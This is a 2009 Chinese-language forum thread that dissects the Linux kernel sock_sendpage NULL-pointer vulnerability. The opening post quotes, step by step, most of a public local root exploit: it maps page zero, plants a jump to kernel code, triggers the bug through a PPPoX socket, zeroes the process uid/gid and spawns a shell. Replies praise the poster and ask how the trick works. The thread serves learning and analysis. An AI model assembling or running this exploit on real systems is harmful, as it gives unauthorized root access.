新爆内核高危漏洞sock_sendpage的利用分析的讨论

独孤九贱

先发点上砖上来引玉，大家一起讨论一下吧。

http://linux.chinaunix.net/bbs/thread-1130262-1-1.html

详细地描述了这个漏洞。

具体漏洞原因在

http://archives.neohapsis.com/ar ... e/2009-08/0174.html

也有描述。


因为sock_sendpage没有做指针检查，有些模块不具备sendpage功能，初始时赋为NULL，这样，没有做检查的sock_sendpage有可能直接调用空指针而导致出错——重新映射地址0，并提升权限！！！！

1. ssize_t sock_sendpage(struct file *file, struct page *page,
   
2.                       int offset, size_t size, loff_t *ppos, int more)
   
3. {
   
4.         struct socket *sock;
   
5.         int flags;
   
6. 
   
7.         sock = SOCKET_I(file->f_dentry->d_inode);
   
8. 
   
9.         flags = !(file->f_flags & O_NONBLOCK) ? 0 : MSG_DONTWAIT;
   
10.         if (more)
    
11.                 flags |= MSG_MORE;
    
12. 
    
13. /*
    
14.         没有做类似的指针检查，就直接调用
    
15. 
    
16.            if (unlikely(!sock->ops->sendpage))   
    
17.                 return -EINVAL;
    
18. 
    
19. */
    
20. 
    
21.         return sock->ops->sendpage(sock, page, offset, size, flags);
    
22. }

复制代码

来看看利用的代码（程序是在安焦上面下载的:
http://www.securityfocus.com/dat ... xploits/36038-4.tgz）：

1. int main(void) {
   
2. char template[] = "/tmp/padlina.XXXXXX";
   
3. int fdin, fdout;
   
4. void *page;
   
5. 
   
6. //获取当前程序的uid和gid，后面权限提升的时候查找使用
   
7. uid = getuid();
   
8. gid = getgid();
   
9. setresuid(uid, uid, uid);
   
10. setresgid(gid, gid, gid);
    
11. 
    
12. if ((personality(0xffffffff)) != PER_SVR4) {
    
13.   if ((page = mmap(0x0, 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS, 0, 0)) == MAP_FAILED) {
    
14.    perror("mmap");
    
15.    return -1;
    
16.   }
    
17. } else {
    
18.   if (mprotect(0x0, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC) < 0) {
    
19.    perror("mprotect");
    
20.    return -1;
    
21.   }

复制代码

程序mmap了地址0x0，接下来

1. *(char *)0 = '\x90';  (nop)
   
2. *(char *)1 = '\xe9';  (jmp)
   
3. *(unsigned long *)2 = (unsigned long)&kernel_code - 6;

复制代码

（这个 - 6是什么意思，大家指点一下）
在地址0x0处埋下代码kernel_code 函数，因为0x90 = nop, 0xe9 = jmp
上面代码可表示为在映射的地址0处，执行

1. nop
   
2. jmp kernel_code

复制代码

不过现在还没有执行，因为Bug没有被激活，程序没有运行到地址0处。

然后就是激活该Bug：

1. if ((fdin = mkstemp(template)) < 0) {
   
2.   perror("mkstemp");
   
3.   return -1;
   
4. }
   
5. 
   
6. if ((fdout = socket(PF_PPPOX, SOCK_DGRAM, 0)) < 0) {
   
7.   perror("socket");
   
8.   return -1;
   
9. }
   
10. 
    
11. unlink(template);
    
12. ftruncate(fdin, PAGE_SIZE);
    
13. sendfile(fdout, fdin, NULL, PAGE_SIZE);

复制代码

这段代码是漏洞描述上的示例代码。。。。。。

关键是kernel_code：

因为Bug被激活，进程已经进入内核上下文：

1. void kernel_code()
   
2. {
   
3. int i;
   
4. uint *p = get_current();

复制代码

kernel_code第一步是获取当前进程的进程描述符，get_current是一个内联汇编：

1. static inline __attribute__((always_inline)) void *get_current()
   
2. {
   
3. unsigned long curr;
   
4. __asm__ __volatile__ (
   
5.   "movl %%esp, %%eax ;"
   
6.   "andl %1, %%eax ;"
   
7.   "movl (%%eax), %0"
   
8.   : "=r" (curr)
   
9.   : "i" (~8191)
   
10. );
    
11. return (void *) curr;
    
12. }

复制代码

这段代码是现成的，描述进程描述符的资料，例如《ULK3》或《Linux内核设计与实现》上都有其介绍。内核中的原型是:

1. static inline struct task_struct * get_current(void)
   
2. {
   
3.         return current_thread_info()->task;
   
4. }
   
5. 
   
6. /* how to get the thread information struct from C */
   
7. static inline struct thread_info *current_thread_info(void)
   
8. {
   
9.         struct thread_info *ti;
   
10.         __asm__("andl %%esp,%0; ":"=r" (ti) : "0" (~(THREAD_SIZE - 1)));
    
11.         return ti;
    
12. }

复制代码

include/asm-i386/current.h

程序返回的是一个uint *指针,而不是struct task_struct *，我认为有两个理由：
A、这是在应用态而不是内核态，如果使用后者，会比较麻烦；
B、这个程序是超版本的，也就是不仅限于某个内核版本，所以，struct task_struct的结构可能会有很大的变化。

所以，没有办法，只能在整个结构范围之内来查找uid和gid。以我的2.6.12为例：
struct task_struct {
……
           /* process credentials */
        uid_t uid,euid,suid,fsuid;
        gid_t gid,egid,sgid,fsgid;
……
}
就是要逐个找到它们，一共是8个字段：
所以，使用uint*指针来指向结构的整个buffer，就可以逐字节的查找。而不是直接使用成员名。（我不知所有历史版本，这些成员的名称是否会变化，这样做不引用成员名，连成员名变化都可以忽略了。）

1. for (i = 0; i < 1024-13; i++) {
   
2.   if (p[0] == uid && p[1] == uid && p[2] == uid && p[3] == uid && p[4] == gid && p[5] == gid && p[6] == gid && p[7] == gid) {
   
3.     p[0] = p[1] = p[2] = p[3] = 0;
   
4.    p[4] = p[5] = p[6] = p[7] = 0;
   
5.    p = (uint *) ((char *)(p + 8) + sizeof(void *));
   
6.    p[0] = p[1] = p[2] = ~0;
   
7.    break;
   
8.   }
   
9.   p++;
   
10. }

复制代码

所以这里要做一个循环，就是为了超版本的在整个结构的数据中逐个搜寻，去匹备那8个成员。查找上限是1024 - 13，应该与struct task_struct结构的大小有关。包子TX贴子中说测试程序可能会引起系统出问题，估计就是出在这里了。（猜测，呵呵）

接下来就是查找到进程的uid和gid，然后替换之，这里设为0，即为root！！！以达到提升权限的目的。

exit_kernel();退出内核态，并调用exit_code()函数，运行shell。

1. static inline __attribute__((always_inline)) void exit_kernel()
   
2. {
   
3. __asm__ __volatile__ (
   
4.   "movl %0, 0x10(%%esp) ;"
   
5.   "movl %1, 0x0c(%%esp) ;"
   
6.   "movl %2, 0x08(%%esp) ;"
   
7.   "movl %3, 0x04(%%esp) ;"
   
8.   "movl %4, 0x00(%%esp) ;"
   
9.   "iret"
   
10.   : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
    
11.       "i" (USER_CS), "r" (exit_code)
    
12.      );
    
13. }

复制代码

1. void exit_code()
   
2. {
   
3. if (getuid() != 0) {
   
4.   fprintf(stderr, "failed\n");
   
5.   exit(-1);
   
6. }
   
7. 
   
8. execl("/bin/sh", "sh", "-i", NULL);
   
9. }

复制代码

这些利用漏洞的人，太强了，PF呀PF，人与人差距太大了，学无止境呀！！！

[ 本帖最后由 独孤九贱 于 2009-8-18 22:52 编辑 ]

Godbach

九贱兄也很强啊。小弟们很是佩服。。

platinum

感觉九贱兄的学习能力和自我钻研能力超强，而且还经常很无私的将一些成果与大家分享
非常敬仰！

goter

好！

独孤九贱

原帖由 platinum 于 2009-8-18 17:55 发表
感觉九贱兄的学习能力和自我钻研能力超强，而且还经常很无私的将一些成果与大家分享
非常敬仰！

大家莫要这样说呀,我也是自己看懂一些,请教别人一些,还有一些不是完全懂.放上来大家讨论学习一下,我也好学透!!!再在回来翻了一个ULK3,发现有地方理解有误,再看看,回头再修改一下.

[ 本帖最后由 独孤九贱 于 2009-8-18 22:08 编辑 ]

Godbach

九贱兄为学和为人的态度都值得我们学习。

独孤九贱

对于Linux这种溢出技术基本上都很成熟了。那两个内联汇编函数在以前的溢出程序中也是频率出现。基本上就是往上套。
比如:
http://www.7747.net/Soft/200908/15070.html
演示vmsplice溢出代码,可以对比参考学习一下.

我觉得作者漂亮的代码是：
mmap(0x0, 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS, 0, 0)
*(char *)0 = '\x90';  (nop)
*(char *)1 = '\xe9';  (jmp)
*(unsigned long *)2 = (unsigned long)&kernel_code - 6;

也不知是不是他原创的,不过偶以前的确没有见过，孤陋寡闻了。现在学习了，呵呵！！！

[ 本帖最后由 独孤九贱 于 2009-8-18 23:32 编辑 ]

Godbach

直接往0地址空间赋值了

emmoblin

我有有点不解，想请教一下：
return sock->ops->sendpage(sock, page, offset, size, flags);
没做检测就直接调用了。这时会跳到进程的虚拟地址0的位置执行。

但是我不理解的是：之前他做了一个mmap，这时向0地址写入代码，不会有什么任何问题吗？
不会破坏系统或者进程吗？

emmoblin

mmap这里我觉得很神奇，相当于让内核执行了用户进程空间的代码。
这样太危险了。